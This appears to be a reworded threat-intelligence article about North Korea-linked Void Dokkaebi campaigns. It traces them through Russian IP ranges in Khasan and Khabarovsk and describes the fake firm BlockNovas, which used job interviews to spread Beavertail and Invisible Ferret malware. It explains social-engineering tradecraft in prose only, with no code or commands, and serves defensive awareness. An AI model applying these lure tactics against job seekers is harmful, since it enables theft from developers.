- Research Trends have detected various IP address ranges in Russia employed for cyber criminality in collaboration with North Korea. These operations are connected to a series of campaigns associated with the Void Dokkaebi intrusion set, also referred to as Famous Chollima.
- The IP address ranges in Russia are masked by an extensive anonymization network utilizing commercial VPN services, proxy servers, and multiple VPS servers with RDP. These ranges are attributed to two companies based in Khasan and Khabarovsk. Khasan is situated close to the border between North Korea and Russia, while Khabarovsk is recognized for its economic and cultural relations with North Korea.
- Research Trends indicate that North Korea has deployed IT personnel who establish connections back to their home country through two IP addresses within the Russian IP ranges and two IP addresses in North Korea. As per telemetry data from Trend Micro, these IT employees associated with the DPRK operate from locations such as China, Russia, and Pakistan.
- According to the evaluation by Research Trends, actors aligned with North Korea utilize the Russian IP ranges to link to numerous VPS servers using RDP, engaging in activities like online interactions on recruitment portals and accessing services related to cryptocurrencies. Some servers engaged in their brute-force attempts to hack cryptocurrency wallet passwords fall under one of the IP ranges in Russia.
- There have been discoveries of instructional videos featuring non-native English text, providing guidance on establishing a Beavertail malware command-and-control server and cracking cryptocurrency wallet passwords. This suggests potential collaboration between North Korea and foreign collaborators.
- Software professionals in Ukraine, the US, and Germany have been targeted in these operations by fictitious organizations enticing them with deceptive job interviews. Research Trends indicate that the primary objective of void Dokkaebi is to pilfer cryptocurrencies from individuals with expertise in cryptocurrency, Web3, and blockchain technologies.
- Trend Vision Oneâ„¢ has the capability to identify and block the Indicators of Compromise (IOCs) elaborated in this article. Customers of Trend Vision One can also access search queries, insights on threats, and reports on threat intelligence to acquire in-depth knowledge and stay updated on Void Dokkaebi.
In North Korea, internet access is limited, with only 1,024 IP addresses assigned to their national network. Despite this constraint, the country plays a significant role in cyber criminal activities. Numerous high-profile campaigns have been attributed to North Korean operatives by international law enforcement agencies, including the recent US$1.5 billion Bybit hack. To conduct cybercrime operations on the scale associated with North Korea, more internet resources are imperative than the limited 1,024 IP addresses. A strategy to achieve this involves deploying or recruiting a substantial number of IT professionals overseas to work remotely. Moreover, sophisticated anonymization networks are utilized to cloak campaigns linked to North Korea, complicating the process of attribution.
This article delves into the roots of certain campaigns affiliated with North Korea originating from five IP ranges in Russia. These IP ranges are concealed through a layer of VPN, proxy, or RDP. They are allocated to two entities located in Khasan and Khabarovsk, Russia. It is noted that campaigns associated with North Korea also leverage internet infrastructure in various other nations.
Located near the border with North Korea and China, Khasan is a town in Russia that hosts the Korea-Russia Friendship Bridge. Khabarovsk, on the other hand, is renowned for its close economic and cultural connections with North Korea. Hence, these towns serve as ideal hubs for cybercrime operations aligned with North Korea’s objectives. Investigations reveal that the Russian IP ranges connect with multiple VPS servers across the globe using RDP and then perform diverse activities such as communication on platforms like Skype, Telegram, Discord, and Slack, engaging with foreign IT professionals on job platforms, and accessing cryptocurrency-related platforms for purposes like draining stolen cryptocurrency wallets or laundering illicit funds.
Foreign IT experts are targeted through a common social engineering tactic that involves enticing software developers with fake job opportunities. In this scheme, developers apply for advertised positions on platforms such as LinkedIn. The deceiving recruiters prompt the applicants to execute specific tasks as part of the recruitment process. These tasks may involve debugging or enhancing code fetched from reputable repositories like GitHub, GitLab, Bitbucket, or private GitLab sites. Although these repositories typically do not host malicious code directly, they may harbor code injecting obfuscated harmful scripts from third-party websites. If the applicant runs this code on their personal system instead of an isolated virtual environment, the attacker gains unauthorized access.
Subsequently, the attacker might deploy additional malware to pilfer sensitive data like passwords and cryptocurrency wallets. They may then attempt to siphon funds from cryptocurrency wallets and access other confidential data. Some compromised devices are integrated into the attacker’s anonymizing network by installing legitimate proxy software like CCProxy.
In another scenario, North Korean IT personnel secure IT roles at Western companies and utilize laptop farms run by collaborators residing in Western countries. Through these laptop farms, North Korean IT workers can hide their remote employment for a foreign country from their victim companies. Research Trends suggest that this setup closely correlates with Beavertail malware campaigns.
This article also explores clusters of Beavertail malware campaigns tied to Void Dokkaebi (also recognized as Famous Chollima). The focus is on a fictitious entity named BlockNovas, which has an online presence through a website and profiles on various job platforms like LinkedIn and Upwork. Numerous applicants have responded to job postings by BlockNovas, with some falling prey to malware during the interview process. BlockNovas advertises vacancies targeting experts in web3 and blockchain technologies in countries like Ukraine, the US, Germany, and others. The entity has employed Beavertail and Invisible Ferret malware and tactics where applicants are induced to download and run malware to resolve a fictitious issue with their laptop camera during an automated interview process.
During the investigation of BlockNovas, it was observed that the lower levels of anonymization layers feature IP ranges in Russia as previously mentioned. Another group of Beavertail command-and-control (C&C) servers has been operated via VPNs, proxies, and RDP sessions from the same Russian IP ranges.
This leads to an intriguing conjecture: Vital North Korean offensive cyber operations are orchestrated from or through internet infrastructure situated in the Russian towns of Khasan and Khabarovsk; this infrastructure has been established since 2017 and expanded since 2023.
BlockNovas
One of the fabricated companies utilized to lure victims into these deceptive interviews is BlockNovas[.]com, showcasing a modern website design and focusing on blockchain technologies (Figure 1). It actively maintains a presence on social media platforms like Facebook, X (formerly known as Twitter), LinkedIn, and various job platforms. This online presence aims to enhance credibility and draw unsuspecting software developers into applying for fictitious positions.
BlockNovas is likely leveraging artificial intelligence (AI) to create online identities and conduct interviews. Many legitimate tech job interviews occur online, potentially leading more applicants to lower their guard. Monitoring BlockNovas on platforms like LinkedIn revealed seemingly new employees occupying key positions, such as a chief technology officer (CTO). These profiles, although having a history on the platform and a significant number of followers, occasionally used compromised accounts to boost new job listings. With an appearance of credibility at first glance, BlockNovas has likely attracted numerous job applicants.
About Author
